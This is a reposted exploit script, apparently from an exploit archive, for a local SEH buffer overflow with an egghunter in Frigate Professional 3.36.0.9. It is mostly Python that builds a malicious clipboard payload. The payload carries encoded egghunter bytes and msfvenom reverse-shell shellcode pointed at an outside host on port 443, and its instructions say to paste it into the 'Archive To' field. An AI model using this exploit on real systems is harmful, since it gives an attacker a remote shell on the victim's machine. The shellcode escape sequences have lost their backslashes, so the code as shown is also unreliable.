Frigate Professional 3.36.0.9 – ‘Pack File’ Buffer Overflow (SEH Egghunter)
TTS
# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-24
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.frigate3.com/
# Software Link: http://www.frigate3.com/download/frigate3_pro.exe
# Version: 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit
# Proof of Concept:
# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Frigate3.exe and go to File -> Pack
# 4. Paste the clipboard into the "Archive To" field and click on Ok button
#!/usr/bin/python
egg = "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx54x58x66x05x44x17x50x5c"
egg += "x25x4Ax50x5cx25x4A"
egg += "x4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx01x7Fx01x2Dx0Bx01x7Fx01x2Dx01x16x02x15x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x7Fx01x01x2Dx50x0Bx14x4Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx7Fx01x01x2Dx51x29x73x04x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x01x2Cx50x2Dx10x46x7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx45x7Bx26x0Cx2Dx7Fx7Fx7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx28x01x52x2Dx7Fx7Fx31x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx72x4Dx3Dx16x2Dx7Fx70x70x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx1Ax7Bx01x7Fx2Dx7Fx01x33x7Fx2Dx01x02x01x02x50"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "x00x0ax0dx13x14x15x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x69x6cx68x68x6ex62x55x50x45x50x43x30x63"
buf += "x50x6ex69x6ax45x45x61x59x50x55x34x4ex6b"
buf += "x52x70x76x50x6cx4bx73x62x76x6cx6cx4bx70"
buf += "x52x42x34x6ex6bx43x42x75x78x64x4fx48x37"
buf += "x42x6ax71x36x65x61x39x6fx6ex4cx67x4cx53"
buf += "x51x71x6cx76x62x56x4cx67x50x79x51x78x4f"
buf += "x36x6dx43x31x79x57x6dx32x4cx32x72x72x66"
buf += "x37x6ex6bx72x72x56x70x6ex6bx32x6ax75x6c"
buf += "x4ex6bx62x6cx37x61x33x48x69x73x43x78x56"
buf += "x61x38x51x50x51x4ex6bx71x49x31x30x57x71"
buf += "x4bx63x6ex6bx71x59x37x68x68x63x57x4ax50"
buf += "x49x6ex6bx75x64x4ex6bx43x31x68x56x35x61"
buf += "x59x6fx6ex4cx69x51x48x4fx36x6dx55x51x6f"
buf += "x37x65x68x4bx50x70x75x69x66x73x33x51x6d"
buf += "x6ax58x35x6bx63x4dx76x44x54x35x4dx34x43"
buf += "x68x4ex6bx70x58x37x54x76x61x59x43x62x46"
buf += "x6cx4bx54x4cx72x6bx6ex6bx51x48x35x4cx35"
buf += "x51x79x43x6cx4bx43x34x6cx4bx63x31x68x50"
buf += "x6dx59x57x34x76x44x67x54x31x4bx51x4bx33"
buf += "x51x71x49x72x7ax50x51x79x6fx69x70x43x6f"
buf += "x63x6fx33x6ax6ex6bx65x42x48x6bx6cx4dx31"
buf += "x4dx50x68x45x63x55x62x73x30x75x50x30x68"
buf += "x44x37x73x43x45x62x43x6fx43x64x45x38x42"
buf += "x6cx53x47x46x46x63x37x69x6fx69x45x48x38"
buf += "x4ax30x45x51x57x70x55x50x67x59x49x54x70"
buf += "x54x32x70x42x48x44x69x6dx50x70x6bx67x70"
buf += "x79x6fx6bx65x66x30x30x50x70x50x32x70x43"
buf += "x70x72x70x67x30x62x70x75x38x58x6ax36x6f"
buf += "x49x4fx79x70x69x6fx48x55x4cx57x53x5ax56"
buf += "x65x52x48x79x50x79x38x4fx54x6dx51x52x48"
buf += "x43x32x53x30x63x31x4dx6bx6dx59x38x66x30"
buf += "x6ax66x70x43x66x53x67x61x78x5ax39x6ex45"
buf += "x72x54x33x51x59x6fx58x55x4bx35x59x50x44"
buf += "x34x66x6cx69x6fx32x6ex65x58x31x65x4ax4c"
buf += "x50x68x6ax50x68x35x39x32x73x66x49x6fx58"
buf += "x55x62x48x42x43x32x4dx73x54x57x70x6bx39"
buf += "x39x73x66x37x76x37x42x77x55x61x49x66x50"
buf += "x6ax54x52x73x69x70x56x78x62x49x6dx32x46"
buf += "x49x57x57x34x51x34x65x6cx53x31x65x51x4c"
buf += "x4dx52x64x61x34x32x30x6bx76x47x70x72x64"
buf += "x51x44x42x70x42x76x46x36x43x66x77x36x42"
buf += "x76x62x6ex32x76x71x46x70x53x46x36x33x58"
buf += "x61x69x58x4cx35x6fx6bx36x6bx4fx4bx65x4d"
buf += "x59x49x70x30x4ex31x46x33x76x6bx4fx66x50"
buf += "x71x78x43x38x4bx37x37x6dx73x50x6bx4fx4b"
buf += "x65x6fx4bx48x70x6cx75x4fx52x72x76x73x58"
buf += "x49x36x6ex75x4dx6dx4dx4dx59x6fx39x45x55"
buf += "x6cx63x36x53x4cx66x6ax4dx50x79x6bx6bx50"
buf += "x64x35x46x65x6fx4bx72x67x45x43x50x72x70"
buf += "x6fx32x4ax65x50x51x43x49x6fx59x45x41x41"
exploit = "A"*4112
# 0x40012623 - pop pop ret rtl60.bpl
exploit += "x74x06x75x04"
exploit += "x23x26x01x40"
exploit += egg
exploit += "C"*(5000-4120-len(egg))
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()
Source link
Tagged with: buffer • egghunter • File • frigate • local • overflow • Pack • professional • SEH • windows
Gloss